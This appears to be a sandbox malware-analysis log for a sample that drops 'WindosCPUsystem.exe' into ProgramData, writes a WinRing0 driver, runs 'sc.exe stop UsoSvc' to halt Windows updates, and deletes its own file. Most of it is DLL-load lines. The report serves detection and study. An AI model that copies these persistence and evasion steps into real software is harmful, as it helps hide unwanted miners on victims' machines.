Source: C:\Windows\explorer.exe | Section loaded: twinapi.appcore.dll
Source: C:\Windows\explorer.exe | Section loaded: ntmarta.dll
Source: C:\Windows\explorer.exe | Section loaded: cryptsp.dll
Source: C:\Windows\explorer.exe | Section loaded: wldp.dll
Source: C:\Windows\explorer.exe | Section loaded: iertutil.dll
Source: C:\Windows\explorer.exe | Section loaded: srvcli.dll
Source: C:\Windows\explorer.exe | Section loaded: netutils.dll
Source: C:\Windows\explorer.exe | Section loaded: umpdc.dll
Source: C:\Windows\explorer.exe | Section loaded: cryptbase.dll
Source: C:\Windows\explorer.exe | Section loaded: winhttp.dll
Source: C:\Windows\explorer.exe | Section loaded: msi.dll
Source: C:\Windows\explorer.exe | Section loaded: winmm.dll
Source: C:\Windows\explorer.exe | Section loaded: dbghelp.dll
Source: C:\Windows\explorer.exe | Section loaded: dbgcore.dll
Source: C:\Windows\explorer.exe | Section loaded: secur32.dll
Source: C:\Windows\explorer.exe | Section loaded: profapi.dll
Source: C:\Windows\explorer.exe | Section loaded: taskschd.dll
Source: C:\Windows\explorer.exe | Section loaded: xmllite.dll
Source: C:\Windows\explorer.exe | Section loaded: rsaenh.dll
Source: C:\Windows\explorer.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\explorer.exe | Section loaded: webio.dll
Source: C:\Windows\explorer.exe | Section loaded: mswsock.dll
Source: C:\Windows\explorer.exe | Section loaded: winnsi.dll
Source: C:\Windows\explorer.exe | Section loaded: dnsapi.dll
Source: C:\Windows\explorer.exe | Section loaded: rasadhlp.dll
Source: C:\Windows\explorer.exe | Section loaded: fwpuclnt.dll
Source: C:\Windows\explorer.exe | Section loaded: schannel.dll
Source: C:\Windows\explorer.exe | Section loaded: napinsp.dll
Source: C:\Windows\explorer.exe | Section loaded: pnrpnsp.dll
Source: C:\Windows\explorer.exe | Section loaded: wshbth.dll
Source: C:\Windows\explorer.exe | Section loaded: nlaapi.dll
Source: C:\Windows\explorer.exe | Section loaded: winrnr.dll
Source: C:\Windows\explorer.exe | Section loaded: mskeyprotect.dll
Source: C:\Windows\explorer.exe | Section loaded: ntasn1.dll
Source: C:\Windows\explorer.exe | Section loaded: ncrypt.dll
Source: C:\Windows\explorer.exe | Section loaded: ncryptsslp.dll
Source: C:\Windows\explorer.exe | Section loaded: msasn1.dll
Source: C:\Windows\explorer.exe | Section loaded: gpapi.dll
Source: C:\Windows\explorer.exe | Section loaded: dpapi.dll
Source: C:\Windows\explorer.exe | Section loaded: edputil.dll
Source: C:\Windows\explorer.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\explorer.exe | Section loaded: smartscreenps.dll
Source: C:\Windows\explorer.exe | Section loaded: policymanager.dll
Source: C:\Windows\explorer.exe | Section loaded: msvcp110_win.dll
Source: C:\Windows\explorer.exe | Section loaded: wintypes.dll
Source: C:\Windows\explorer.exe | Section loaded: appresolver.dll
Source: C:\Windows\explorer.exe | Section loaded: bcp47langs.dll
Source: C:\Windows\explorer.exe | Section loaded: slc.dll
Source: C:\Windows\explorer.exe | Section loaded: sppc.dll
Source: C:\Windows\explorer.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\explorer.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\explorer.exe | Section loaded: apphelp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
Source: C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe | Section loaded: apphelp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wusa.exe | Section loaded: dpx.dll
Source: C:\Windows\System32\wusa.exe | Section loaded: wtsapi32.dll
Source: C:\Windows\System32\wusa.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\wusa.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wusa.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\powercfg.exe | Section loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exe | Section loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exe | Section loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exe | Section loaded: umpdc.dll
Source: C:\Windows\System32\powercfg.exe | Section loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exe | Section loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exe | Section loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exe | Section loaded: umpdc.dll
Source: C:\Windows\System32\powercfg.exe | Section loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exe | Section loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exe | Section loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exe | Section loaded: umpdc.dll
Source: C:\Windows\System32\powercfg.exe | Section loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exe | Section loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exe | Section loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exe | Section loaded: umpdc.dll
Source: C:\Windows\explorer.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\explorer.exe | Section loaded: userenv.dll
Source: C:\Windows\explorer.exe | Section loaded: cryptbase.dll
Source: C:\Windows\explorer.exe | Section loaded: cryptsp.dll
Source: C:\Windows\explorer.exe | Section loaded: rsaenh.dll
Source: C:\Windows\explorer.exe | Section loaded: sspicli.dll
Source: C:\Windows\explorer.exe | Section loaded: powrprof.dll
Source: C:\Windows\explorer.exe | Section loaded: umpdc.dll
Source: C:\Windows\explorer.exe | Section loaded: uxtheme.dll
Source: C:\Windows\explorer.exe | Section loaded: mswsock.dll
Source: C:\Windows\explorer.exe | Section loaded: dhcpcsvc6.dll
Source: C:\Windows\explorer.exe | Section loaded: dhcpcsvc.dll
Source: C:\Windows\explorer.exe | Section loaded: dnsapi.dll
Source: C:\Windows\explorer.exe | Section loaded: napinsp.dll
Source: C:\Windows\explorer.exe | Section loaded: pnrpnsp.dll
Source: C:\Windows\explorer.exe | Section loaded: wshbth.dll
Source: C:\Windows\explorer.exe | Section loaded: nlaapi.dll
Source: C:\Windows\explorer.exe | Section loaded: winrnr.dll
Source: C:\Windows\explorer.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\explorer.exe | Section loaded: rasadhlp.dll
Source: C:\Windows\explorer.exe | Section loaded: fwpuclnt.dll
Source: C:\Windows\explorer.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\explorer.exe | Section loaded: amsi.dll
Source: C:\Windows\explorer.exe | Section loaded: profapi.dll
Source: C:\Windows\explorer.exe | Section loaded: msasn1.dll
                        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\explorer.exe Section loaded: aepic.dll
                        Source: C:\Windows\explorer.exe Section loaded: twinapi.dll
                        Source: C:\Windows\explorer.exe Section loaded: userenv.dll
                        Source: C:\Windows\explorer.exe Section loaded: iphlpapi.dll
                        Source: C:\Windows\explorer.exe Section loaded: powrprof.dll
                        Source: C:\Windows\explorer.exe Section loaded: windows.storage.dll
                        Source: C:\Windows\explorer.exe Section loaded: dxgi.dll
                        Source: C:\Windows\explorer.exe Section loaded: windows.storage.dll
                        Source: C:\Windows\explorer.exe Section loaded: kernel.appcore.dll
                        Source: C:\Windows\explorer.exe Section loaded: propsys.dll
                        Source: C:\Windows\explorer.exe Section loaded: coremessaging.dll
                        Source: C:\Windows\explorer.exe Section loaded: urlmon.dll
                        Source: C:\Windows\explorer.exe Section loaded: windows.storage.dll
                        Source: C:\Windows\explorer.exe Section loaded: windows.storage.dll
                        Source: C:\Windows\explorer.exe Section loaded: kernel.appcore.dll
                        Source: C:\Windows\explorer.exe Section loaded: wtsapi32.dll
                        Source: C:\Windows\explorer.exe Section loaded: wininet.dll
                        Source: C:\Windows\explorer.exe Section loaded: ntmarta.dll
                        Source: C:\Windows\explorer.exe Section loaded: uxtheme.dll
                        Source: C:\Windows\explorer.exe Section loaded: dwmapi.dll
                        Source: C:\Windows\explorer.exe Section loaded: sspicli.dll
                        Source: C:\Windows\explorer.exe Section loaded: kernel.appcore.dll
                        Source: C:\Windows\explorer.exe Section loaded: twinapi.appcore.dll
                        Source: C:\Windows\explorer.exe Section loaded: cryptsp.dll
                        Source: C:\Windows\explorer.exe Section loaded: wldp.dll
                        Source: C:\Windows\explorer.exe Section loaded: iertutil.dll
                        Source: C:\Windows\explorer.exe Section loaded: srvcli.dll
                        Source: C:\Windows\explorer.exe Section loaded: netutils.dll
                        Source: C:\Windows\explorer.exe Section loaded: umpdc.dll
                        Source: C:\Windows\explorer.exe Section loaded: wlanapi.dll
                        Source: C:\Windows\explorer.exe Section loaded: profapi.dll
                        Source: C:\Windows\explorer.exe Section loaded: cryptbase.dll
                        Source: C:\Windows\explorer.exe Section loaded: winhttp.dll
                        Source: C:\Windows\explorer.exe Section loaded: msi.dll
                        Source: C:\Windows\explorer.exe Section loaded: winmm.dll
                        Source: C:\Windows\explorer.exe Section loaded: dbghelp.dll
                        Source: C:\Windows\explorer.exe Section loaded: dbgcore.dll
                        Source: C:\Windows\explorer.exe Section loaded: secur32.dll
                        Source: C:\Windows\explorer.exe Section loaded: dpapi.dll
                        Source: C:\Windows\explorer.exe Section loaded: mozglue.dll
                        Source: C:\Windows\explorer.exe Section loaded: wsock32.dll
                        Source: C:\Windows\explorer.exe Section loaded: vcruntime140.dll
                        Source: C:\Windows\explorer.exe Section loaded: msvcp140.dll
                        Source: C:\Windows\explorer.exe Section loaded: vcruntime140.dll
                        Source: C:\Windows\explorer.exe Section loaded: vcruntime140_1.dll
                        Source: C:\Windows\explorer.exe Section loaded: vcruntime140_1.dll
                        Source: C:\Windows\explorer.exe Section loaded: rsaenh.dll
                        Source: C:\Windows\explorer.exe Section loaded: ondemandconnroutehelper.dll
                        Source: C:\Windows\explorer.exe Section loaded: webio.dll
                        Source: C:\Windows\explorer.exe Section loaded: mswsock.dll
                        Source: C:\Windows\explorer.exe Section loaded: winnsi.dll
                        Source: C:\Windows\explorer.exe Section loaded: dnsapi.dll
                        Source: C:\Windows\explorer.exe Section loaded: rasadhlp.dll
                        Source: C:\Windows\explorer.exe Section loaded: fwpuclnt.dll
                        Source: C:\Windows\explorer.exe Section loaded: schannel.dll
                        Source: C:\Windows\explorer.exe Section loaded: mskeyprotect.dll
                        Source: C:\Windows\explorer.exe Section loaded: ntasn1.dll
                        Source: C:\Windows\explorer.exe Section loaded: ncrypt.dll
                        Source: C:\Windows\explorer.exe Section loaded: ncryptsslp.dll
                        Source: C:\Windows\explorer.exe Section loaded: msasn1.dll
                        Source: C:\Windows\explorer.exe Section loaded: gpapi.dll
                        Source: C:\Windows\explorer.exe Section loaded: aepic.dll
                        Source: C:\Windows\explorer.exe Section loaded: twinapi.dll
                        Source: C:\Windows\explorer.exe Section loaded: userenv.dll
                        Source: C:\Windows\explorer.exe Section loaded: iphlpapi.dll
                        Source: C:\Windows\explorer.exe Section loaded: powrprof.dll
                        Source: C:\Windows\explorer.exe Section loaded: windows.storage.dll
                        Source: C:\Windows\explorer.exe Section loaded: dxgi.dll
                        Source: C:\Windows\explorer.exe Section loaded: windows.storage.dll
                        Source: C:\Windows\explorer.exe Section loaded: kernel.appcore.dll
                        Source: C:\Windows\explorer.exe Section loaded: propsys.dll
                        Source: C:\Windows\explorer.exe Section loaded: coremessaging.dll
                        Source: C:\Windows\explorer.exe Section loaded: urlmon.dll
                        Source: C:\Windows\explorer.exe Section loaded: windows.storage.dll
                        Source: C:\Windows\explorer.exe Section loaded: windows.storage.dll
                        Source: C:\Windows\explorer.exe Section loaded: kernel.appcore.dll
                        Source: C:\Windows\explorer.exe Section loaded: wtsapi32.dll
                        Source: C:\Windows\explorer.exe Section loaded: wininet.dll
                        Source: C:\Windows\explorer.exe Section loaded: uxtheme.dll
                        Source: C:\Windows\explorer.exe Section loaded: dwmapi.dll
                        Source: C:\Windows\explorer.exe Section loaded: sspicli.dll
                        Source: C:\Windows\explorer.exe Section loaded: kernel.appcore.dll
                        Source: C:\Windows\explorer.exe Section loaded: twinapi.appcore.dll
                        Source: C:\Windows\explorer.exe Section loaded: ntmarta.dll
                        Source: C:\Windows\explorer.exe Section loaded: cryptsp.dll
                        Source: C:\Windows\explorer.exe Section loaded: wldp.dll
                        Source: C:\Windows\explorer.exe Section loaded: iertutil.dll
                        Source: C:\Windows\explorer.exe Section loaded: srvcli.dll
                        Source: C:\Windows\explorer.exe Section loaded: netutils.dll
                        Source: C:\Windows\explorer.exe Section loaded: umpdc.dll
                        Source: C:\Windows\explorer.exe Section loaded: wlanapi.dll
                        Source: C:\Windows\explorer.exe Section loaded: profapi.dll
                        Source: C:\Windows\explorer.exe Section loaded: cryptbase.dll
                        Source: C:\Windows\explorer.exe Section loaded: winhttp.dll
                        Source: C:\Windows\explorer.exe Section loaded: msi.dll
                        Source: C:\Windows\explorer.exe Section loaded: winmm.dll
                        Source: C:\Windows\explorer.exe Section loaded: dbghelp.dll
                        Source: C:\Windows\explorer.exe Section loaded: dbgcore.dll
                        Source: C:\Windows\explorer.exe Section loaded: secur32.dll
                        Source: C:\Windows\explorer.exe Section loaded: dpapi.dll
                        Source: C:\Windows\explorer.exe Section loaded: mozglue.dll
                        Source: C:\Windows\explorer.exe Section loaded: wsock32.dll
                        Source: C:\Windows\explorer.exe Section loaded: vcruntime140.dll
                        Source: C:\Windows\explorer.exe Section loaded: msvcp140.dll
                        Source: C:\Windows\explorer.exe Section loaded: vcruntime140.dll
                        Source: C:\Windows\explorer.exe Section loaded: vcruntime140_1.dll
                        Source: C:\Windows\explorer.exe Section loaded: vcruntime140_1.dll
                        Source: C:\Windows\explorer.exe Section loaded: rsaenh.dll
                        Source: C:\Windows\explorer.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
                        Source: file.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                        Source: Binary string: d:\hotproject\winring0\source\dll\sys\lib\amd64\WinRing0.pdb source: WindosCPUsystem.exe, 00000008.00000003.2430713857.000001BBFD920000.00000004.00000001.00020000.00000000.sdmp, ggbfqxmgkimt.sys.8.dr
                        Source: file.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                        Source: file.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                        Source: file.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                        Source: file.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                        Source: file.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007D8110 LoadLibraryW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,0_2_007D8110
                        Source: WindosCPUsystem.exe.4.dr Static PE information: section name: .00cfg
                        Source: C:\Users\user\Desktop\file.exe Code function: 0_2_007EB1A5 push ecx; ret 0_2_007EB1B8
                        Source: C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe Code function: 8_2_00007FF60AA91394 push qword ptr [00007FF60AA9B004h]; ret 8_2_00007FF60AA91403
                        Source: C:\Windows\explorer.exe Code function: 33_2_013FD150 push rbp; retf 33_2_013FD151
                        Source: C:\Windows\explorer.exe Code function: 35_2_0281D150 push rbp; retf 35_2_0281D151
                        Source: C:\Windows\explorer.exe Code function: 36_2_02A5D150 push rbp; retf 36_2_02A5D151

                        Persistence and Installation Behavior

                        Source: C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe File created: C:\Users\user\AppData\Local\Temp\ggbfqxmgkimt.sys
                        Source: C:\Windows\explorer.exe File created: C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe
                        Source: C:\Windows\explorer.exe Code function: 33_2_01391000 GetCommandLineW,CommandLineToArgvW,ExitProcess,RegGetValueW,ExitProcess,OpenEventW,ExitProcess,SetEvent,CloseHandle,ExitProcess,CreateMutexExW,ExitProcess,CreateEventW,ExitProcess,OpenMutexW,ExitProcess,CreateThread,ExitProcess,WaitForMultipleObjects,WaitForSingleObject,ExitProcess,33_2_01391000
                        Source: C:\Windows\explorer.exe Code function: 33_2_013934B0 LocalAlloc,LocalAlloc,LocalAlloc,SHGetKnownFolderPath,LocalAlloc,LocalAlloc,GetPrivateProfileStringW,LocalAlloc,_snprintf,LocalAlloc,_snprintf,CreateFileA,GetFileSize,LocalAlloc,ReadFile,type_info::_name_internal_method,wsprintfW,wsprintfW,wsprintfW,wsprintfW,MultiByteToWideChar,wsprintfW,LocalFree,MultiByteToWideChar,wsprintfW,LocalFree,LocalFree,LocalFree,LocalFree,CloseHandle,LocalFree,LocalFree,LocalFree,CoTaskMemFree,LocalFree,LocalFree,LocalFree,33_2_013934B0
                        Source: C:\Windows\explorer.exe Code function: 33_2_0139AF00 LocalAlloc,LocalAlloc,LocalAlloc,SHGetKnownFolderPath,LocalAlloc,LocalAlloc,GetPrivateProfileStringW,LocalAlloc,_snprintf,LocalAlloc,_snprintf,CreateFileA,GetFileSize,LocalAlloc,ReadFile,type_info::_name_internal_method,wsprintfW,type_info::_name_internal_method,wsprintfW,type_info::_name_internal_method,type_info::_name_internal_method,MultiByteToWideChar,wsprintfW,type_info::_name_internal_method,type_info::_name_internal_method,MultiByteToWideChar,wsprintfW,LocalFree,CloseHandle,LocalFree,LocalFree,LocalFree,LocalFree,CoTaskMemFree,LocalFree,LocalFree,LocalFree,33_2_0139AF00
                        Source: C:\Windows\explorer.exe Code function: 35_2_027B34B0 LocalAlloc,LocalAlloc,LocalAlloc,SHGetKnownFolderPath,LocalAlloc,LocalAlloc,GetPrivateProfileStringW,LocalAlloc,_snprintf,LocalAlloc,_snprintf,CreateFileA,GetFileSize,LocalAlloc,ReadFile,type_info::_name_internal_method,wsprintfW,wsprintfW,wsprintfW,wsprintfW,MultiByteToWideChar,wsprintfW,LocalFree,MultiByteToWideChar,wsprintfW,LocalFree,LocalFree,LocalFree,LocalFree,CloseHandle,LocalFree,LocalFree,LocalFree,CoTaskMemFree,LocalFree,LocalFree,LocalFree,35_2_027B34B0
                        Source: C:\Windows\explorer.exe Code function: 35_2_027BAF00 LocalAlloc,LocalAlloc,LocalAlloc,SHGetKnownFolderPath,LocalAlloc,LocalAlloc,GetPrivateProfileStringW,LocalAlloc,_snprintf,LocalAlloc,_snprintf,CreateFileA,GetFileSize,LocalAlloc,ReadFile,type_info::_name_internal_method,wsprintfW,type_info::_name_internal_method,wsprintfW,type_info::_name_internal_method,type_info::_name_internal_method,MultiByteToWideChar,wsprintfW,type_info::_name_internal_method,type_info::_name_internal_method,MultiByteToWideChar,wsprintfW,LocalFree,CloseHandle,LocalFree,LocalFree,LocalFree,LocalFree,CoTaskMemFree,LocalFree,LocalFree,LocalFree,35_2_027BAF00
                        Source: C:\Windows\explorer.exe Code function: 36_2_029F34B0 LocalAlloc,LocalAlloc,LocalAlloc,SHGetKnownFolderPath,LocalAlloc,LocalAlloc,GetPrivateProfileStringW,LocalAlloc,_snprintf,LocalAlloc,_snprintf,CreateFileA,GetFileSize,LocalAlloc,ReadFile,type_info::_name_internal_method,wsprintfW,wsprintfW,wsprintfW,wsprintfW,MultiByteToWideChar,wsprintfW,LocalFree,MultiByteToWideChar,wsprintfW,LocalFree,LocalFree,LocalFree,LocalFree,CloseHandle,LocalFree,LocalFree,LocalFree,CoTaskMemFree,LocalFree,LocalFree,LocalFree,36_2_029F34B0
                        Source: C:\Windows\explorer.exe Code function: 36_2_029FAF00 LocalAlloc,LocalAlloc,LocalAlloc,SHGetKnownFolderPath,LocalAlloc,LocalAlloc,GetPrivateProfileStringW,LocalAlloc,_snprintf,LocalAlloc,_snprintf,CreateFileA,GetFileSize,LocalAlloc,ReadFile,type_info::_name_internal_method,wsprintfW,type_info::_name_internal_method,wsprintfW,type_info::_name_internal_method,type_info::_name_internal_method,MultiByteToWideChar,wsprintfW,type_info::_name_internal_method,type_info::_name_internal_method,MultiByteToWideChar,wsprintfW,LocalFree,CloseHandle,LocalFree,LocalFree,LocalFree,LocalFree,CoTaskMemFree,LocalFree,LocalFree,LocalFree,36_2_029FAF00
                        Source: C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop UsoSvc

                        Hooking and other Techniques for Hiding and Protection

                        Source: C:\Windows\explorer.exe File deleted: c:\users\user\desktop\file.exe
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
